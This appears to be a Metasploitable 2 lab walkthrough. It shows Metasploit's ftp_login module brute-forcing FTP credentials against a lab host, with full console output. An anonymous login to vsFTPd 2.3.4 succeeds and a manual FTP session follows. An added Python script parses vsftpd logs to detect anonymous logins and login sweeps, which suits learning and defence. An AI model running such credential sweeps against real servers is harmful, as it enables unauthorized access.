
Metasploitable 2 Exploit ftp


Exploit # 8 : FTP

When the Nmap and Nessus scans show that port 21/ftp is open, Metasploit's ftp_login module can be used to try usernames and passwords. Metasploit's own wordlists may be sufficient.

 

msf> search ftp login

 

Matching Modules

================

  Name                                     Disclosure Date       Rank    Description

  ----                                     ---------------       ----    -----------

  auxiliary/dos/windows/ftp/guildftp_cwdlist  2008-10-12 00:00:00 UTC  normal Guild FTPd 0.999.8.11/0.999.14 Heap Corruption

  auxiliary/dos/windows/ftp/titan626_site 2008-10-14 00:00:00 UTC  normal Titan FTP Server 6.26.630 SITE WHO DoS

  auxiliary/dos/windows/ftp/winftp230_nlst 2008-09-26 00:00:00 UTC  normal WinFTP 2.3.0 NLST Denial of Service

  auxiliary/dos/windows/ftp/xmeasy560_nlst 2008-10-13 00:00:00 UTC  normal XM Easy Personal FTP Server 5.6.0 NLST DoS

  auxiliary/dos/windows/ftp/xmeasy570_nlst 2009-03-27 00:00:00 UTC  normal XM Easy Personal FTP Server 5.7.0 NLST DoS

  auxiliary/scanner/ftp/ftp_login                                   normal FTP Authentication Scanner

  exploit/windows/ftp/freefloatftp_wbem    2012-12-07 00:00:00 UTC  excellent  FreeFloat FTP Server Arbitrary File Upload

  exploit/windows/ftp/warftpd_165_pass     1998-03-19 00:00:00 UTC  average War-FTPD 1.65 Password Overflow

  post/windows/gather/credentials/ftpx                              normal Windows Gather FTP Explorer (FTPX) Credential Extraction

  post/windows/gather/credentials/smartftp                          normal Windows Gather SmartFTP Saved Password Extraction

 

 

msf auxiliary(rlogin_login) > use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > show options

 

Module options (auxiliary/scanner/ftp/ftp_login):

  Name           Current Setting   Required  Description

  ----           ---------------  --------  -----------

  BLANK_PASSWORDS   true          no     Try blank passwords for all users

  BRUTEFORCE_SPEED  5             yes    How fast to bruteforce, from 0 to 5

  PASSWORD                        no     A specific password to authenticate with

  PASS_FILE                       no     File containing passwords, one per line

  RECORD_GUEST   false         no     Record anonymous/guest logins to the database

  RHOSTS                          yes    The target address range or CIDR identifier

  RPORT          21            yes    The target port

  STOP_ON_SUCCESS   false         yes    Stop guessing when a credential works for a host

  THREADS        1             yes    The number of concurrent threads

  USERNAME                        no     A specific username to authenticate as

  USERPASS_FILE                   no     File containing users and passwords separated by space, one pair per line

  USER_AS_PASS   true         no     Try the username as the password for all users

  USER_FILE                       no     File containing usernames, one per line

  VERBOSE        true          yes    Whether to print output for all attempts

 

msf auxiliary(ftp_login) > set RHOSTS 172.16.52.133

RHOSTS => 172.16.52.133

msf auxiliary(ftp_login) > exploit

 

[*] 172.16.52.133:21 - Starting FTP login sweep

[*] Connecting to FTP server 172.16.52.133:21...

[*] Connected to target FTP server.

[*] 172.16.52.133:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'

[*] 172.16.52.133:21 FTP - Attempting FTP login for 'anonymous':'User@'

[+] 172.16.52.133:21 - Successful FTP login for 'anonymous':'User@'

[*] 172.16.52.133:21 - User 'anonymous' has READ access

[*] Successful authentication with read access on 172.16.52.133 will not be reported

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(ftp_login) >

 

The scan found the username anonymous with the password user@. These can be used to log in from the console, or the server can be reached from a browser at ftp://172.16.52.133. By connecting to the FTP server, some information can be obtained for gaining privileges.

#ftp 172.16.52.133

Connected to 172.16.52.133.

220 (vsFTPd 2.3.4)

Name (172.16.52.133:root): anonymous   

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls -lat

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 2 0     65534     4096 Mar 17  2010 ..

drwxr-xr-x 2 0     65534     4096 Mar 17  2010 .

226 Directory send OK
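
From the server's side, the login sweep and the anonymous session shown above leave traces in the vsftpd log. The following is an added example, not part of the original post: it assumes the default vsftpd.log line layout, and the sample lines, the `audit` function and the failure threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the layout vsftpd writes to its log file
# (assumed: the default vsftpd.log line format; adjust LINE if yours differs).
SAMPLE_LOG = """\
Wed Mar 17 10:02:11 2010 [pid 4100] CONNECT: Client "172.16.52.1"
Wed Mar 17 10:02:11 2010 [pid 4099] [ftp] OK LOGIN: Client "172.16.52.1", anon password "User@"
Wed Mar 17 10:02:14 2010 [pid 4103] [root] FAIL LOGIN: Client "172.16.52.1"
Wed Mar 17 10:02:17 2010 [pid 4105] [admin] FAIL LOGIN: Client "172.16.52.1"
Wed Mar 17 10:02:20 2010 [pid 4107] [user] FAIL LOGIN: Client "172.16.52.1"
Wed Mar 17 10:02:23 2010 [pid 4109] [postgres] FAIL LOGIN: Client "172.16.52.1"
Wed Mar 17 10:02:26 2010 [pid 4111] [service] FAIL LOGIN: Client "172.16.52.1"
Wed Mar 17 11:40:02 2010 [pid 4150] [alice] FAIL LOGIN: Client "172.16.52.20"
Wed Mar 17 11:40:09 2010 [pid 4152] [alice] OK LOGIN: Client "172.16.52.20"
"""

# Matches only LOGIN result lines; the anon-password suffix is optional.
LINE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: '
    r'Client "(?P<ip>[^"]+)"(?:, anon password "(?P<anon_pw>[^"]*)")?'
)

def audit(log_text, fail_threshold=5):
    """Return anonymous logins and clients whose failures look like a login sweep."""
    anonymous = []                      # (client ip, supplied anon password)
    fails = defaultdict(list)           # client ip -> usernames that failed
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue                    # CONNECT lines, transfers, noise
        if m["result"] == "OK" and m["anon_pw"] is not None:
            anonymous.append((m["ip"], m["anon_pw"]))
        elif m["result"] == "FAIL":
            fails[m["ip"]].append(m["user"])
    # A single mistyped password stays below the threshold; a sweep does not.
    sweeps = {
        ip: {"failures": len(users), "distinct_users": len(set(users))}
        for ip, users in fails.items()
        if len(users) >= fail_threshold
    }
    return {"anonymous_logins": anonymous, "sweeps": sweeps}

if __name__ == "__main__":
    report = audit(SAMPLE_LOG)
    for ip, pw in report["anonymous_logins"]:
        print(f"anonymous login from {ip} (password field {pw!r})")
    for ip, s in report["sweeps"].items():
        print(f"possible login sweep from {ip}: {s}")
```

If anonymous access is not needed, setting `anonymous_enable=NO` in vsftpd.conf removes the finding entirely.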

 
